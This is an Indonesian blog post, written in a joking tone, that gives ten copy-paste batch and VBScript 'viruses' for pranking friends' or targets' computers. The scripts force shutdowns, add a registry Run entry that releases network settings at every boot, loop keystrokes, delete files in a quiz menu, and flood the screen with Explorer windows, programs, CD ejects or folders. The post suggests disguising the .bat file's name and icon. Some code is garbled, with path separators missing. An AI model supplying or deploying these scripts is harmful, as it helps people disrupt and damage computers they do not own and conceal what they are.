Cara Membuat Virus Komputer Mudah Dan Sederhana


Kali ini saya akan membahas tentang bagaimana cara membuat virus sederhana melalui suatu software bawaan Komputer/Laptop. Mungkin beberapa dari kita suka greget/kesal sendiri yakan sama teman sendiri, terkadang muncul dibenak otak untuk menjahili mereka melalui komputer yang mereka punya.

Ada banyak trik yang dapat membuat teman kalian bingung, bahkan kesal karna Komputer/Laptop milik teman kalian Ngablu/Error.

Oke langsung saja tidak usah banyak kata lagi kita menuju ketahap pembuatannya, simak dan pelajari cara menjahili teman yang satu ini :v

Siapkan Alat Tempurnya :
  1. Komputer/Laptop
  2. Koneksi Internet
  3. Aplikasi/Software Notepad
  4. Kopi + Rokok
  5. Cewek Buat Nemenin Kalo Luh Ga Jomblo Wkwkwk :V
Jika bahan diatas semua sudah siap langsung saja kita masuk ke tahap pembuatan.


1. Membuat Virus Shutdown

Cara kerja virus komputer sederhana ini adalah dengan memaksa komputer teman atau target anda menjadi Shutdown. Untuk membuatnya silakan kalian jalankan/buka Notepad dan copy paste kode dibawah ini.

@echo off msg * I dont like you shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s

Jika sudah kalian copas kodenya pada Notepad kalian save filenya dengan nama bebas diakhiri dengan ( .bat ) contoh ForceShutdown.bat dan ubah type filenya menjadi ( All File ).

Untuk mengaktifkan virus ini kalian harus mengeklik 2 kali pada file .bat yang tadi kalian buat, maka otomatis virus ini akan muncul dan mengeluarkan pop up layer pada komputer yang mengaktifkannya.

2. Mematikan Internet Secara Permanen

Saat berada disuatu Jaringan Internet pasti kesal dong jika ada orang yang malah download? Membuat internet lemot karena bandwith berkurang cepat. Makanya, coba matikan internet teman / target kalian yang sedang asik download dengan script virus sederhana berikut.

echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

Seperti biasa, simpan dengan nama apapun dan gunakan ekstensi ( .bat ) lalu klik untuk mengaktifkannya.

3. Virus CapsLock

Siapa yang gak kesel jika ada orang ngetik isi tulisannya huruf besar semua? Orang yang menerima pesan dengan huruf besar semua jelas akan merasa terganggu atau bahkan marah bukan? Maka dari itu mari kita buat Virus CapsLock untuk sekedar iseng menjahili teman ataupun lainnya muehehe :v

Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop


Copy dan Paste kode diatas ke Notepad, lalu simpan dengan nama file ForceCapsLock.vbs dan type filenya ( All file ). Klik 2 kali untuk mulai mengaktifkan virus ini.

4.Virus Alay

Siapa bilang cuma anak jaman now yang bisa alay? Komputer kalian juga bisa alay loh jika terinspeksi virus keyboard alay. Nah, inilah cara membuat virus komputer yang bisa membuat keyboard jadi alay, kalian bisa gunakan script berikut.

Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wscript.sleep 100 wshshell.sendkeys "{NUMLOCK}" wscript.sleep 100 wshshell.sendkeys "{SCROLLLOCK}" loop


Caranya sama, copy dan paste kode diatas ke Notepad. Lalu save dengan nama ForceAlay.vbs dan type file ( All File ).

5. Virus Orang Jelek

Dikatain jelek itu emang nyebelin, kalo emang 1/2 kali mungkin bisa ditahan. Tapi kalo terus - terusan ngatain jelek dimana coba? Nah, dengan kode dibawah ini kalian bisa membuat sebuah virus komputer sederhana yang akan memaksa komputer target untuk mengeluarkan Alert bahwa " dia jelek " tanpa henti :v

Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "Muka Lu Jelek Kayak Komputer Lu" loop


Masih sama simpan script virus diatas ke Notepad, lalu save dengan nama VirusOrangJelek.vbs dan type file ( All file )

6. Virus Kuis

Semua orang suka dengan yang namanya kuis bukan? Biasanya kuis ditayangkan diundian ataupun televisi, tapi disini kita akan membuat virus berbentuk kuis pada komputer.

Untuk membuat Virus Kuisnya kalian bisa copy dan pastekan script dibawah ke Notepad.

@echo off title Kuis hari ini! :menu cls echo Jika kamu kena virus apa yang kamu lakukan? pause echo pilih yang mana: echo 1. Matiin komputer echo 2. Format aja echo 3. Nangis echo 4. Beli komputer baru set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:xxx if %input%==3 @ECHO off msg * Muka lu jelek msg * Ngaca dulu gih! msg * Hayo lu, CPU lu gw acak-acak ya msg * Udah, install ulang aja msg * Mau kelar kan masalahnya? @ECHO off :top START %SystemRoot% system32notepad.exe GOTO top

Jika sudah save file dengan nama VirusQuis.bat type fill ( All file ).

7. Flood Windows Exploler



Kenapa dinamakan Flood Windows Exploler? Karena virus yang satu ini dapat membuka Windows Exploler dalam jumlah yang ditentukan pembuat virus, semisalkan pembuat virus menerapkan 1 s/d 100 maka Windows Exploler yang akan Pop Up mengikuti jumlah yang ditentukan.

Langsung saja copy pastekan kode dibawah ke Notepad.

C:\windows\explorer.exe C:\windows\explorer.exe C:\windows\explorer.exe C:\windows\explorer.exe C:\windows\explorer.exe

Jika ingin menambah jumlah pop up yang akan keluar nantinya maka kalian hanya tinggal perbanyak comannd diatas sesuai selera kalian. Sudah? Simpan dengan ekstensi ( .bat) type ( All File )

Dan jika ingin terlihat tidak mencurigakan ubah nama dan icon sesuai selera, yang terpenting ekstensi file ( .bat )

8. Membuat DVD/CD-ROM Selalu Keluar Dengan Sendirinya



Mungkin ini seperti terkesan horor dan banyak mengira kalau tombol switch CD-ROM/DVD rusak padahal sebenarnya adalah ulah dari sebuah virus. Hal ini sebenarnya mengubah code eject pada windows exploler selalu aktif, untuk manualnya sangat mudah sekali yaitu bukalah windows exploler => klik kanan pada CD-ROM/DVD kalian => klik kanan => Eject.

Dari situ kita akan mengaktifkan menjadi Not Null dan terus aktif dengan menggunakan kode vbs yang kita tulis dengan notepad, Berikut kodenya.

Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

Simpan dengan nama bebas diakhiri dengan ekstensi ( .bat ) type file ( All Type ).

9. Flood Program



Pada contoh kali ini, hampir mirip dengan virus diatas, namun terkadang komputer/laptop memiliki spek yang berbeda beda. Jadi intinya virus membuka 100 exploler tidak akan membuat masalah hang pada laptop/ komputer spek tinggi.

Maka dari itu jika 100 explorler tidak membuat hang, namun bagaimana jika program berat seperti Mozila Firefox, Adobe Photoshop, dan lain sebagainya.

Contoh script virus membuka program Opera dan Mozilla Firefox otomatis sekali klik.

cd\ 
"Program Files (x86)"\opera\launcher.exe

cd\
"Program Files (x86)"\"Mozilla Firefox"\firefox.exe

Copy pastekan code diatas ke notepad dan simpan dengan nama crasher.bat type ( All File).

10. Flood Folder Spam

Nah kali ini kalian bisa mengkreasikan dengan kombinasi virus shorcut yang ditempel dihalaman dekstop dan tentunya iconnya diganti dengan program yang ada di dekstop teman soubat. Flood Folder Spam merupakan sebuah perintah dari CMD yang dapat membuat folder, dengan menggunakan "MKDIR" maka kalian dapat membuat folder - folder secara otomatis dan diberi nama sesuai yang kalian inginkan.

Contohnya saya akan membuat folder spam dalam directory D: yang terbuat otomatis dengan nama incaralaptop, jessica, dan kuantum.

mkdir incaralaptop
mkdir jessica
mkdir kuantum
mkdir terserah

Simpan dengan nama Makdir.bat dan hasilnya akan seperti gambar dibawah.


Ada banyak cara membuat flooding yang bisa membuat laptop/komputer kalian erorr, lag bahkan hang. Salah satu contohnya yah seperti postingan diatas Flood  Folder Spam.

Oke cukup saya rasa cukup dulu sampai disini postingan ini, dan perlu saya ingatkan kembali bahwa postingan ini semata - mata hanya mengajak kalian belajar bersama bukan semata - mata menggurui karna bawasanya kita semua juga masih dalam tahap pembelajaran. Sekaian dan terimagajih :v

Postingan terkait:

Belum ada tanggapan untuk "Cara Membuat Virus Komputer Mudah Dan Sederhana"

Posting Komentar